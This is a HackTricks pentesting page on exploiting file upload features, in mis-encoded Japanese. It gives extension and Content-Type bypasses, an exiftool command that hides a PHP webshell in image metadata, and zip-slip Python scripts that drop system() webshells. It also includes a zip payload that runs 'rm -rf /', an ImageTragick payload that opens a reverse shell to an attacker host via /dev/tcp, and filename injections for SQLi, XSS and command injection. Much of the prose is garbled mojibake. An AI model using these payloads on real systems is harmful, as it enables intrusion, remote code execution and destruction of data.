24 KiB
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒç€Ÿã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãPEASSã®ææ°ããŒãžã§ã³ãå ¥æããããHackTricksãPDFã§ããŠã³ããŒããããã§ããïŒSUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitterã§ðŠ@carlospolopmããã©ããŒããŠãã ããã
-
ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããªã«PRãæåºããŠãã ããã
ãã¡ã€ã«ã®ã¢ããããŒãäžè¬çãªæ¹æ³è«
- ããã«æ¡åŒµåãæã€ãã¡ã€ã«ãã¢ããããŒãããŠã¿ãŠãã ããïŒäŸïŒfile.png.php_ãŸãã¯_file.png.php5ïŒã
- PHPã®æ¡åŒµåïŒ.php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
- ASPã®æ¡åŒµåïŒ.asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .asp, .cer, .shtml
- æ¡åŒµåã®äžéšã倧æåã«ããŠã¿ãŠãã ãããäŸïŒ.pHp, .pHP5, .PhAr ...
- ããã«ïŒãŸãã¯ãã以äžã®ïŒæ¡åŒµåãã¢ããããŒãããŠã¿ãŠãã ããïŒç¹å®ã®æ¡åŒµåãååšãããã©ããããã¹ããããã¹æ§æã®ãã§ãã¯ããã€ãã¹ããã®ã«åœ¹ç«ã¡ãŸãïŒïŒ
- file.png.php
- file.png.txt.php
- éããã«æ¡åŒµåãã¢ããããŒãããŠã¿ãŠãã ããïŒApacheã®ãã¹æ§æãæªçšããã®ã«åœ¹ç«ã¡ãŸããæ¡åŒµå_.php_ã§ããããå¿ ããã.phpã§çµããããã§ã¯ãªãå Žåã«ã³ãŒããå®è¡ãããŸãïŒïŒ
- äŸïŒfile.php.png
- ãã«æåã䜿çšããããã«æ¡åŒµåïŒ
- äŸïŒfile.php%00.png
- æ¡åŒµåã®æ«å°Ÿã«ç¹æ®æåãè¿œå ããŠãã ããïŒ%00ã%20ãïŒè€æ°ã®ãããïŒ....
- file.php%00
- file.php%20
- _file.php...... --> Windowsã§ã¯ããã¡ã€ã«ãæ«å°Ÿã«ãããã§äœæããããšããããã¯åé€ãããŸãïŒ.phpãšããæ¡åŒµåããã§ãã¯ãããã£ã«ã¿ããã€ãã¹ã§ããŸãïŒ
- file.php/
- _file.php._
- Content-Typeãããã®å€ãèšå®ããããšã§ãContent-Typeã®ãã§ãã¯ããã€ãã¹ããŠãã ããïŒimage/pngãtext/plainãapplication/octet-stream
- ããžãã¯ãã³ããŒãã§ãã¯ããã€ãã¹ããããã«ããã¡ã€ã«ã®å
é ã«å®éã®ç»åã®ãã€ããè¿œå ããŠãã ããïŒ_file_ã³ãã³ããæ··ä¹±ãããŸãïŒããŸãã¯ãã·ã§ã«ãã¡ã¿ããŒã¿ã«æ¿å
¥ããŸãïŒ
exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg
- ãã¡ã€ã«å ã®ã©ãã«ã§ãããããèšå®ã§ãããããããžãã¯ãã€ãããã¡ã€ã«ã§ãã§ãã¯ãããŠããå¯èœæ§ããããŸãã
- Windowsã®NTFS代æ¿ããŒã¿ã¹ããªãŒã ïŒADSïŒã䜿çšããŸãããã®å ŽåãçŠæ¢ãããæ¡åŒµåã®åŸãã«ã³ãã³æåã:ããæ¿å ¥ãããŸãããã®çµæããµãŒããŒäžã«çŠæ¢ãããæ¡åŒµåã®ç©ºã®ãã¡ã€ã«ãäœæãããŸãïŒäŸïŒãfile.asax:.jpgãïŒããã®ãã¡ã€ã«ã¯ããã®åŸä»ã®ãã¯ããã¯ã䜿çšããŠç·šéããããšãã§ããŸããããšãã°ããã®çããã¡ã€ã«åã䜿çšããããšãã§ããŸãããŸããã::$dataããã¿ãŒã³ã䜿çšããŠç©ºã§ãªããã¡ã€ã«ãäœæããããšãã§ããŸãããããã£ãŠããã®ãã¿ãŒã³ã®åŸã«ãããæåãè¿œå ããããšãããããªãå¶éããã€ãã¹ããã®ã«åœ¹ç«ã€å ŽåããããŸãïŒäŸïŒãfile.asp::$data.ãïŒã
- èš±å¯ãããæ¡åŒµåïŒpngïŒã§ããã¯ãã¢ãã¢ããããŒãããããã¯ãã¢ãå®è¡ããããã¹æ§æãç¥ããŸãã
- æ¢ã«ã¢ããããŒãããããã¡ã€ã«ããªããŒã ããè匱æ§ãèŠã€ããŠãã ããïŒæ¡åŒµåãå€æŽããããïŒã
- ããŒã«ã«ãã¡ã€ã«ã€ã³ã¯ã«ãŒãžã§ã³ã®è匱æ§ãèŠã€ããŠãããã¯ãã¢ãå®è¡ããŠãã ããã
- å¯èœãªæ å ±æŒæŽ©ïŒ
- åãååã®åããã¡ã€ã«ãè€æ°åïŒåæã«ïŒã¢ããããŒããã
- æ¢ã«ååšãããã¡ã€ã«ãŸãã¯ãã©ã«ãã®ååãæã€ãã¡ã€ã«ãã¢ããããŒããã
- â.âãâ..âãââŠâãååãšãããã¡ã€ã«ãã¢ããããŒããããããšãã°ãApacheã®Windowsã§ã¯ãã¢ããªã±ãŒã·ã§ã³ãã¢ããããŒãããããã¡ã€ã«ãã/www/uploads/ããã£ã¬ã¯ããªã«ä¿åããå Žåãã.ãã®ãã¡ã€ã«åã¯ã/www/ããã£ã¬ã¯ããªã«ãuploadsããšããååã®ãã¡ã€ã«ãäœæããŸãã
- NTFSã§åé€ã容æã§ãªããã¡ã€ã«ãã¢ããããŒããããäŸïŒãâŠ:.jpgãïŒWindowsïŒ
- ååã«
|<>*?â
ãªã©ã®ç¡å¹ãªæåãå«ããã¡ã€ã«ãWindowsã«ã¢ããããŒãããïŒWindowsïŒ - CONãPRNãAUXãNULãCOM1ãCOM2ãCOM3ãCOM4ãCOM5ãCOM6ãCOM7ãCOM8ãCOM9ãLPT1ãLPT2ãLPT3ãLPT4ãLPT5ãLPT6ãLPT7ãLPT8ãLPT9ãªã©ã®äºçŽæžã¿ïŒçŠæ¢ïŒåã䜿çšããŠWindowsã«ãã¡ã€ã«ãã¢ããããŒã
.phar
ãã¡ã€ã«ã¯ãJavaã®.jar
ã®ãããªãã®ã§ãããPHPçšã§ããPHPã§å®è¡ããããã¹ã¯ãªããå ã§ã€ã³ã¯ã«ãŒããããããããšãã§ããŸãã
.inc
æ¡åŒµåã¯ããã¡ã€ã«ãã€ã³ããŒãããããã ãã«äœ¿çšãããããšããããŸãã®ã§ãããæç¹ã§ã誰ãããã®æ¡åŒµåãå®è¡ã§ããããã«ããŠããå¯èœæ§ããããŸãã
BurpSuitãã©ã°ã€ã³ã䜿çšããŠãå€ãã®å¯èœãªãã¡ã€ã«ã¢ããããŒãã®è匱æ§ããã§ãã¯ããŠãã ãããhttps://github.com/modzero/mod0BurpUploadScannerãŸãã¯ãã¢ããããŒãã§ãããã¡ã€ã«ãèŠã€ããããŸããŸãªããªãã¯ãè©ŠããŠã³ãŒããå®è¡ããã³ã³ãœãŒã«ã¢ããªã±ãŒã·ã§ã³ã䜿çšããŠãã ãããhttps://github.com/almandin/fuxploider
wgetãã¡ã€ã«ã¢ããããŒã/SSRFããªãã¯
å Žåã«ãã£ãŠã¯ããµãŒããŒããã¡ã€ã«ãããŠã³ããŒãããããã«wget
ã䜿çšããŠãããURLãæå®ã§ããããšããããŸãããããã®å Žåãã³ãŒãã¯ããŠã³ããŒãããããã¡ã€ã«ã®æ¡åŒµåããã¯ã€ããªã¹ãå
ã«ããããšã確èªããŠãèš±å¯ããããã¡ã€ã«ã®ã¿ãããŠã³ããŒããããããã«ããŸãããã ãããã®ãã§ãã¯ã¯ãã€ãã¹ã§ããŸãã
Linuxã§ã®ãã¡ã€ã«åã®æ倧é·ã¯255ã§ãããwget
ã¯ãã¡ã€ã«åã236æåã«åãè©°ããŸãã"A"*232+".php"+".gif"ãšããååã®ãã¡ã€ã«ãããŠã³ããŒãããããšãã§ããŸãããã®ãã¡ã€ã«åã¯ãã§ãã¯ããã€ãã¹ããŸãïŒãã®äŸã§ã¯".gif"ãæå¹ãªæ¡åŒµåã§ãïŒããã ããwget
ã¯ãã¡ã€ã«ã"A"*232+".php"ãšããååã«å€æŽããŸãã
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
python3 -m http.server 9080
#Download the file
wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
The name is too long, 240 chars total.
Trying to shorten...
New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
Connecting to 127.0.0.1:9080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 10 [image/gif]
Saving to: âAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.phpâ
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s
2020-06-13 03:14:06 (1.96 MB/s) - âAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.phpâ saved [10/10]
泚æããŠãã ããããã®ãã§ãã¯ããã€ãã¹ããããã«èããŠããå¥ã®ãªãã·ã§ã³ã¯ãHTTPãµãŒããŒãå¥ã®ãã¡ã€ã«ã«ãªãã€ã¬ã¯ããããããšã§ãããã®ãããåæã®URLã¯ãã§ãã¯ããã€ãã¹ããwgetã¯æ°ããååã§ãªãã€ã¬ã¯ãããããã¡ã€ã«ãããŠã³ããŒãããŸããwgetããã©ã¡ãŒã¿--trust-server-names
ã䜿çšããŠããå Žåãé€ããŠãããã¯æ©èœããŸããããªããªããwgetã¯ãªãã€ã¬ã¯ããããããŒãžãå
ã®URLã§æå®ããããã¡ã€ã«åã§ããŠã³ããŒãããããã§ãã
ãã¡ã€ã«ã¢ããããŒãããä»ã®è匱æ§ãž
- ãã¡ã€ã«åã
../../../tmp/lol.png
ã«èšå®ãããã¹ãã©ããŒãµã«ãè©Šã¿ã - ãã¡ã€ã«åã
sleep(10)-- -.jpg
ã«èšå®ããSQLã€ã³ãžã§ã¯ã·ã§ã³ãéæããããšãã§ãããããããŸãã - ãã¡ã€ã«åã
<svg onload=alert(document.comain)>
ã«èšå®ããŠãXSSãéæãã - ãã¡ã€ã«åã
; sleep 10;
ã«èšå®ããŠãããã€ãã®ã³ãã³ãã€ã³ãžã§ã¯ã·ã§ã³ããã¹ãããïŒè©³çŽ°ã¯ãã¡ãã®ã³ãã³ãã€ã³ãžã§ã¯ã·ã§ã³ã®ããªãã¯ãåç §ïŒ - ç»åïŒsvgïŒãã¡ã€ã«ã®ã¢ããããŒãã«ãããXSS
- JSãã¡ã€ã«ã®ã¢ããããŒã+XSS = Service Workersã®æªçš
- svgã¢ããããŒãã«ãããXXE
- svgãã¡ã€ã«ã®ã¢ããããŒãã«ãããªãŒãã³ãªãã€ã¬ã¯ã
- æåãªImageTrickã®è匱æ§
- ãŠã§ããµãŒããŒã«ç»åãååŸãããããšãã§ããå ŽåãSSRFãæªçšããããšãã§ããŸãããã®ç»åãããã€ãã®å ¬éãµã€ãã«ä¿åãããå Žåãhttps://iplogger.org/invisible/ããã®URLãæå®ããŠããã¹ãŠã®èšªåè ã®æ å ±ãçãããšãã§ããŸãã
以äžã¯ãã¢ããããŒãã«ãã£ãŠéæã§ãã10ã®ããšã®ããããªã¹ãã§ãïŒãªã³ã¯ããïŒïŒ
- ASP / ASPX / PHP5 / PHP / PHP3ïŒWebã·ã§ã« / RCE
- SVGïŒæ ŒçŽåXSS / SSRF / XXE
- GIFïŒæ ŒçŽåXSS / SSRF
- CSVïŒCSVã€ã³ãžã§ã¯ã·ã§ã³
- XMLïŒXXE
- AVIïŒLFI / SSRF
- HTML / JSïŒHTMLã€ã³ãžã§ã¯ã·ã§ã³ / XSS / ãªãŒãã³ãªãã€ã¬ã¯ã
- PNG / JPEGïŒãã¯ã»ã«ãã©ããæ»æïŒDoSïŒ
- ZIPïŒLFIçµç±ã®RCE / DoS
- PDF / PPTXïŒSSRF / BLIND XXE
ZIPãã¡ã€ã«ã®èªå解åã¢ããããŒã
ãµãŒããŒå ã§è§£åãããZIPãã¢ããããŒãã§ããå Žåã2ã€ã®ããšãã§ããŸãïŒ
ã·ã³ããªãã¯ãªã³ã¯
ä»ã®ãã¡ã€ã«ãžã®ã·ã³ããªãã¯ãªã³ã¯ãå«ããªã³ã¯ãã¢ããããŒããã解åããããã¡ã€ã«ã«ã¢ã¯ã»ã¹ããããšã§ããªã³ã¯ããããã¡ã€ã«ã«ã¢ã¯ã»ã¹ã§ããŸãïŒ
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
ç°ãªããã©ã«ãã«è§£åãã
解åããããã¡ã€ã«ã¯äºæããªããã©ã«ãã«äœæãããŸãã
OSã¬ãã«ã®ã³ãã³ãå®è¡ããã®ä¿è·ãæäŸãããšç°¡åã«æããããããããŸããããæ®å¿µãªããããã¯çå®ã§ã¯ãããŸãããZIPã¢ãŒã«ã€ã圢åŒã¯éå±€çãªå§çž®ããµããŒãããŠãããäžäœãã£ã¬ã¯ããªãåç §ããããšãã§ããããã察象ã¢ããªã±ãŒã·ã§ã³ã®è§£åæ©èœãæªçšããããšã§å®å šãªã¢ããããŒããã£ã¬ã¯ããªããè±åºããããšãã§ããŸãã
ãã®çš®ã®ãã¡ã€ã«ãäœæããããã®èªååããããšã¯ã¹ããã€ãã¯ãã¡ãã§èŠã€ããããšãã§ããŸã: https://github.com/ptoomey3/evilarc
python evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
以äžã¯ãæªæã®ããzipãã¡ã€ã«ãäœæããããã®Pythonã³ãŒãã§ãïŒ
import zipfile
def create_malicious_zip(file_path, content):
with zipfile.ZipFile(file_path, 'w') as zip_file:
zip_file.writestr('../malicious_script.py', content)
malicious_content = '''
import os
os.system('rm -rf /')
'''
create_malicious_zip('malicious.zip', malicious_content)
ãã®ã³ãŒãã¯ãcreate_malicious_zip
ãšããé¢æ°ã䜿çšããŠãæå®ããããã¡ã€ã«ãã¹ã«æªæã®ããzipãã¡ã€ã«ãäœæããŸããmalicious_content
å€æ°ã«ã¯ãæªæã®ããã¹ã¯ãªãããå«ãŸããŠããŸãããã®ã¹ã¯ãªããã¯ãrm -rf /
ã³ãã³ããå®è¡ããã·ã¹ãã äžã®ãã¹ãŠã®ãã¡ã€ã«ãåé€ããŸãã
ãã®ã³ãŒããå®è¡ãããšãmalicious.zip
ãšããååã®zipãã¡ã€ã«ãäœæããããã®äžã«../malicious_script.py
ãšããååã®ãã¡ã€ã«ãå«ãŸããŸãããã®ãã¡ã€ã«ã¯ãæªæã®ããã¹ã¯ãªãããå®è¡ããããã®ãã®ã§ãã
ãã®æªæã®ããzipãã¡ã€ã«ãã¢ããããŒãããããã¡ã€ã«ãšããŠåŠçãããŠã§ãã¢ããªã±ãŒã·ã§ã³ã«å¯ŸããŠäœ¿çšããããšã§ãã·ã¹ãã ã«æ·±å»ãªåœ±é¿ãäžããå¯èœæ§ããããŸãã
#!/usr/bin/python
import zipfile
from cStringIO import StringIO
def create_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
z.writestr('otherfile.xml', 'Content of the file')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()
create_zip()
ãªã¢ãŒãã³ãã³ãå®è¡ãéæããããã«ã以äžã®æé ãå®è¡ããŸããïŒ
- PHPã·ã§ã«ãäœæããŸãïŒ
<?php
if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
}?>
- ããã¡ã€ã«ã¹ãã¬ãŒããšåŒã°ããææ³ã䜿çšããå§çž®ãããzipãã¡ã€ã«ãäœæããŸãã
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip cmd.zip xx*.php
adding: xxAcmd.php (deflated 40%)
adding: xxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
root@s2crew:/tmp#
- ããã¯ã¹ãšãã£ã¿ãŸãã¯viã䜿çšããŠããxxAããã../ãã«å€æŽããŸããç§ã¯viã䜿çšããŸããïŒ
:set modifiable
:%s/xxA/..\//g
:x!
å®äºããã®ã¯ããš1ã¹ãããã§ãïŒZIPãã¡ã€ã«ãã¢ããããŒãããã¢ããªã±ãŒã·ã§ã³ã«è§£åãããŸãïŒæåããã°ããŠã§ããµãŒããŒã«ååãªæš©éãããå Žåãã·ã¹ãã äžã«ç°¡åãªOSã³ãã³ãå®è¡ã·ã§ã«ãååšããŸãïŒ
åè: https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/
ç°ãªãååã§è§£åãã
ã¢ããªã±ãŒã·ã§ã³ã«ãã£ãŠã¯ãzipãã¡ã€ã«å ã®æ¡åŒµåããã§ãã¯ããŠãã¡ã€ã«ã®èªã¿èŸŒã¿ããããã¯ããå ŽåããããŸãããã®æ€èšŒãè¡šé¢çã§ãã€ãŸãããŒã«ã«ãã£ãŒã«ãããããŒå ã®ãã¡ã€ã«åããã§ãã¯ããã ãã®å Žåã解ååŸã«å¥ã®æ¡åŒµåãæã€ãã¡ã€ã«ã§ãããšã¢ããªã±ãŒã·ã§ã³ã«ä¿¡ããããããšã§åé¿ããããšãã§ããŸãã
åã®ã¹ã¯ãªãããåå©çšããŠzipãã¡ã€ã«ãäœæããããšãã§ããŸãã
#!/usr/bin/python
import zipfile
from cStringIO import StringIO
def create_zip():
f = StringIO()
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
z.writestr('shell.php .pdf', '<?php echo system($_REQUEST["cmd"]); ?>')
z.close()
zip = open('poc.zip','wb')
zip.write(f.getvalue())
zip.close()
create_zip()
泚æããŠãã ãããååã«ã¯ã¹ããŒã¹ãå«ãŸããŠããŸããä»ãçæãããzipãã¡ã€ã«ãããã¯ã¹ãšãã£ã¿ã§ç·šéããäžå€®ãã£ã¬ã¯ããªãããå
ã®ãã£ãŒã«ãåããã«ãã€ã00
ã§çœ®ãæããããšãã§ããŸãã
# before changing the name of the file inside the Central Directory header
00000080: 0000 0073 6865 6c6c 2e70 6870 202e 7064 ...shell.php .pd
# after changing the name of the file inside the Central Directory header
00000080: 0000 0073 6865 6c6c 2e70 6870 002e 7064 ...shell.php..pd
ã¢ããªã±ãŒã·ã§ã³ãzipå
ã®ãã¡ã€ã«ã®ãã¡ã€ã«åããã§ãã¯ããå Žåããã®ãã§ãã¯ã«äœ¿çšãããååã¯ãããŒã«ã«ãã¡ã€ã«ããããŒã®ååã§ãããzipãæå·åãããŠããå Žåã¯é©çšãããŸããïŒpkzipã®ä»æ§ãåç
§ïŒããã¡ã€ã«ãä¿åããããã«äœ¿çšãããååã¯ã7zãŸãã¯unzipã2ã€ã®ååã®éã«éããèŠã€ããå Žåãäžå€®ãã£ã¬ã¯ããªããããŒã®ååã«ãªããŸãããã«ãã€ãã®ãããã§ãååã¯shell.php
ã«ãªããŸãã
解åãããå ŽåïŒ
7z e poc.zip
ls
shell.php
åèæç®:
https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html
https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT
ImageTragic
ãã®ã³ã³ãã³ããç»åã®æ¡åŒµåã§ã¢ããããŒãããŠãèåŒ±æ§ (ImageMagick , 7.0.1-1) ãæªçšããŸãã
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
PGNã«PHPã·ã§ã«ãåã蟌ã
IDATãã£ã³ã¯ã«ãŠã§ãã·ã§ã«ãé 眮ããäž»ãªçç±ã¯ããªãµã€ãºããã³åãµã³ããªã³ã°æäœããã€ãã¹ã§ããããã§ããPHP-GDã«ã¯ããããè¡ãããã®2ã€ã®é¢æ°ãimagecopyresizedãšimagecopyresampledãå«ãŸããŠããŸãã
ãã®èšäºãèªãã§ãã ããïŒhttps://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
ããªã°ããããã¡ã€ã«
ã»ãã¥ãªãã£ã®æèã§ã®ããªã°ããããšã¯ãè€æ°ã®ç°ãªããã¡ã€ã«ã¿ã€ãã®æå¹ãªåœ¢åŒã§ãããã¡ã€ã«ã®ããšãæããŸããäŸãã°ãGIFARã¯GIFãã¡ã€ã«ãšRARãã¡ã€ã«ã®äž¡æ¹ã§ãããŸããGIFãšJSã®äž¡æ¹ãPPTãšJSã®äž¡æ¹ãªã©ãè€æ°ã®ãã©ãŒãããã§ãããã¡ã€ã«ãååšããŸãã
ããªã°ããããã¡ã€ã«ã¯ããã¡ã€ã«ã¿ã€ãã«åºã¥ãä¿è·ããã€ãã¹ããããã«ãã䜿çšãããŸãããŠãŒã¶ãŒãå±éºãªãã¡ã€ã«ïŒJSãã¡ã€ã«ãPHPãã¡ã€ã«ãPharãã¡ã€ã«ãªã©ïŒãã¢ããããŒãããããšãé²ãããã«ãå€ãã®ã¢ããªã±ãŒã·ã§ã³ã¯ç¹å®ã®ã¿ã€ãïŒJPEGãGIFãDOCãªã©ïŒã®ã¿ã®ã¢ããããŒããèš±å¯ããŸãã
ããã«ãããè€æ°ã®ç°ãªã圢åŒã®ãã©ãŒãããã«æºæ ãããã¡ã€ã«ãã¢ããããŒãã§ããŸããJPEGã®ããã«èŠããããå®éã«ã¯PHARãã¡ã€ã«ïŒPHp ARchiveïŒã§ãããã¡ã€ã«ãã¢ããããŒãããããšãã§ããŸãããã ããæå¹ãªæ¡åŒµåãå¿ èŠã§ãããã¢ããããŒãæ©èœãèš±å¯ããªãå Žåã¯åœ¹ã«ç«ã¡ãŸããã
詳现ã¯ãã¡ãïŒhttps://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a
âïž HackTricks Cloud âïž -ðŠ Twitter ðŠ - ðïž Twitch ðïž - ð¥ Youtube ð¥
-
ãµã€ããŒã»ãã¥ãªãã£äŒæ¥ã§åããŠããŸããïŒ HackTricksã§äŒç€Ÿã宣äŒãããã§ããïŒãŸãã¯ãææ°ããŒãžã§ã³ã®PEASSãå ¥æããããHackTricksãPDFã§ããŠã³ããŒãããããããã§ããïŒ SUBSCRIPTION PLANSããã§ãã¯ããŠãã ããïŒ
-
The PEASS FamilyãèŠã€ããŠãã ãããç¬å çãªNFTã®ã³ã¬ã¯ã·ã§ã³ã§ãã
-
å ¬åŒã®PEASSïŒHackTricksã®ã°ããºãæã«å ¥ããŸãããã
-
ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitterã§ç§ããã©ããŒããŠãã ããðŠ@carlospolopm.
-
ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãhacktricksãªããžããªãšhacktricks-cloudãªããžããªã«PRãæåºããŠãã ããã